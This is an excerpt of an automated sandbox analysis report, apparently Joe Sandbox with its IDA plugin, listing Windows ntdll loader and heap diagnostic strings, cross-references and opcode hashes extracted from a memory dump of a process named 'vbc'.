                                                                • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                Strings
                                                                • LdrpInitShimEngine, xrefs: 056299F4, 05629A07, 05629A30
                                                                • apphelp.dll, xrefs: 055C6496
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05629A2A
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 05629A11, 05629A3A
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 056299ED
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05629A01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05642180
                                                                • SXS: %s() passed the empty activation context, xrefs: 05642165
                                                                • RtlGetAssemblyStorageRoot, xrefs: 05642160, 0564219A, 056421BA
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 056421BF
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05642178
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0564219F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                Strings
                                                                • Loading import redirection DLL: '%wZ', xrefs: 05648170
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 05648181, 056481F5
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 056481E5
                                                                • LdrpInitializeImportRedirection, xrefs: 05648177, 056481EB
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0560C6C3
                                                                • LdrpInitializeProcess, xrefs: 0560C6C4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                APIs
                                                                  • Part of subcall function 05612DF0: LdrInitializeThunk.NTDLL ref: 05612DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610D74
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                Strings
                                                                • @, xrefs: 05608591
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0560855E
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 05608421
                                                                • LdrpInitializeProcess, xrefs: 05608422
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 056355AE
                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 056354ED
                                                                • HEAP: , xrefs: 056354E0, 056355A1
                                                                • HEAP[%wZ]: , xrefs: 056354D1, 05635592
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                Strings
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 056421D9, 056422B1
                                                                • SXS: %s() passed the empty activation context, xrefs: 056421DE
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 056422B6
                                                                • .Local, xrefs: 056028D8
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 056310AE
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05630FE5
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0563106B
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05631028
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                Strings
                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0564362F
                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 05643640, 0564366C
                                                                • LdrpFindDllActivationContext, xrefs: 05643636, 05643662
                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 0564365C
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                Strings
                                                                • LdrpDynamicShimModule, xrefs: 0563A998
                                                                • apphelp.dll, xrefs: 055F2462
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0563A9A2
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0563A992
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                Strings
                                                                • @, xrefs: 055CCD63
                                                                • InstallLanguageFallback, xrefs: 055CCD7F
                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 055CCD34
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 056482E8
                                                                • Failed to reallocate the system dirs string !, xrefs: 056482D7
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 056482DE
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • PreferredUILanguages, xrefs: 0568C212
                                                                • @, xrefs: 0568C1F1
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0568C1C5
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                Strings
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05654888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 05654899
                                                                • LdrpCheckRedirection, xrefs: 0565488F
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                Strings
                                                                • LdrpInitializationFailure, xrefs: 056520FA
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 05652104
                                                                • Process initialization failed with status 0x%08lx, xrefs: 056520F3
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: #%u
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                Strings
                                                                • , xrefs: 056732B8
                                                                • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 05673011
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                Strings
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                Strings
                                                                • LdrpResGetMappingSize Exit, xrefs: 055DAC7C
                                                                • LdrpResGetMappingSize Enter, xrefs: 055DAC6A
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                • API String ID: 0-1497657909
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$MUI
                                                                • API String ID: 0-17815947
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$Flst
                                                                • API String ID: 0-758220159
                                                                Strings
                                                                • kLsE, xrefs: 055D0540
                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 055D063D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                • API String ID: 0-2547482624
                                                                Strings
                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 055DA2FB
                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 055DA309
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                • API String ID: 0-2876891731
                                                                Strings
                                                                • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05611025
                                                                • @, xrefs: 05611050
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                • API String ID: 0-2976085014
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Cleanup Group$Threadpool!
                                                                • API String ID: 2994545307-4008356553
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MUI
                                                                • API String ID: 0-1339004836
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PATH
                                                                • API String ID: 0-1036084923
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: w
                                                                • API String ID: 0-476252946
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GlobalTags
                                                                • API String ID: 0-1106856819
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: EXT-
                                                                • API String ID: 0-1948896318
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AlternateCodePage
                                                                • API String ID: 0-3889302423
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TrustedInstaller
                                                                • API String ID: 0-565535830
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: WindowsExcludedProcs
                                                                • API String ID: 0-3583428290
                                                                Strings
                                                                • Critical error detected %lx, xrefs: 05687027
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Critical error detected %lx
                                                                • API String ID: 0-802127002
                                                                • Instruction Fuzzy Hash: AD717E71A00609EFCB14DFA5C988FEEBBB8FF88724F144569E945A7250DB30EA41CB54
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e4f9fe9e3153cf71126fbd235921f516dd1754b0d5e2b32f889d81faa96b5c4
                                                                • Instruction ID: 7a5b68442376fcc1012a7bdc080f35fb106baaedb6d6ed89bd9b01e776d2afce
                                                                • Opcode Fuzzy Hash: 3e4f9fe9e3153cf71126fbd235921f516dd1754b0d5e2b32f889d81faa96b5c4
                                                                • Instruction Fuzzy Hash: C671F032200B01AFDB32CF14D854F6ABBB6FF40764F148A28E6579B6A0DB75E944CB54
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e33f5219790713970029d08b6ea011e61761f96eb753443b17c119c020c792d6
                                                                • Instruction ID: 333cf49e3b18c5858846e46fd0066538aa6e21eb4fc1db950152a23950a87f87
                                                                • Opcode Fuzzy Hash: e33f5219790713970029d08b6ea011e61761f96eb753443b17c119c020c792d6
                                                                • Instruction Fuzzy Hash: 5B61CC71A00205DFDB18DF68C885ABEBBB6FF48310F14566AE612EB290DB709D42CF54
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78cfa3aabfb0246a64f1521fdb73e1082454e1770358b53a8e21f1d8cbf51bee
                                                                • Instruction ID: 8013977a2b216d133bdcf4d3d11f1e067869faf7749c05bfd41e7b865ba9981c
                                                                • Opcode Fuzzy Hash: 78cfa3aabfb0246a64f1521fdb73e1082454e1770358b53a8e21f1d8cbf51bee
                                                                • Instruction Fuzzy Hash: 407118B6E00209AFDB15DB94C895FEEBBB9FF04350F104169EA11A7290E774AE05CF94
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                • Instruction ID: 7c5622137da9ac95c0b840a8b6d8f7c957743a0b99a24b37d33d78b23a7c6b12
                                                                • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                • Instruction Fuzzy Hash: CF717E71554B528FD7318FA4C544B32BBF2BF81761F540AADD9E646AE1E3B0A881CF80
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b934c4cc231a3f7141bebda51547fd62ef76d16d0fc9a7458e82c842c6bdc666
                                                                • Instruction ID: 19f5a83facb5f73f3a8e76d2e8906d3cf089a8426569ad3718ef3373f14427be
                                                                • Opcode Fuzzy Hash: b934c4cc231a3f7141bebda51547fd62ef76d16d0fc9a7458e82c842c6bdc666
                                                                • Instruction Fuzzy Hash: 6A51B372605601AFDB22EEA4C848E7BB7E9EBC9760F05062EFE40DB250D630DD05C792
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e50ae21f30a97db90b362b281d76adad9605af2d642753c15bd4913f0a0e8a5
                                                                • Instruction ID: aed9aa105926da6374499325dc9534d9f0950046dcbaddde11df33c1e2579dcc
                                                                • Opcode Fuzzy Hash: 6e50ae21f30a97db90b362b281d76adad9605af2d642753c15bd4913f0a0e8a5
                                                                • Instruction Fuzzy Hash: C2518171700745AFDB34DF59D889A3BB7EEBB44319F10082EE20687A61D7B8E845CB91
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                • Instruction ID: dfd291aa3c2a1932e6c8334cf794f7381026a48b5ca4e57df079f96f863b97d5
                                                                • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                • Instruction Fuzzy Hash: 89518075E0460ADFCF14CF98C5816EDB7BAFB88300F148579D926A7350D636AE41CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd1fcb46c9fbfd2c6334ed9fc24945c916b0dc8ecc5ce6b3dbf7334f948f154a
                                                                • Instruction ID: 90ed072c370e55939bba7e479aa4117dccbf72572d04bb2d6c09faeca1e42f9d
                                                                • Opcode Fuzzy Hash: bd1fcb46c9fbfd2c6334ed9fc24945c916b0dc8ecc5ce6b3dbf7334f948f154a
                                                                • Instruction Fuzzy Hash: D151E4726087029FDB19DF28C840BAAB7EAFF85350F04492DF98597391D734E909CB95
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd892f3a2c6259358236fc3274dea98484036befb1033a8cff25ef2f89e0aad9
                                                                • Instruction ID: a55e9ce76501579e0ec617627239a2cfaa99bfd259eccb0091ce4f1da3228d42
                                                                • Opcode Fuzzy Hash: bd892f3a2c6259358236fc3274dea98484036befb1033a8cff25ef2f89e0aad9
                                                                • Instruction Fuzzy Hash: 3951AD70A007089BD720CFA6C888A6BFBF9BF94714F10471ED19257AA1C7B0A945CB90
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bbf70120134d4f05e54af354110039d5a78794619654a43b3b4e42dbe90c4792
                                                                • Instruction ID: 71df7f24ea41809638c165463919509fb1a20aa5e7c6358dfeb84c9cea0d2c2e
                                                                • Opcode Fuzzy Hash: bbf70120134d4f05e54af354110039d5a78794619654a43b3b4e42dbe90c4792
                                                                • Instruction Fuzzy Hash: CE51A931650A15DFCB26EFA4C984EABB3BEFF44380F410869E546976A0DB31ED01CB50
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
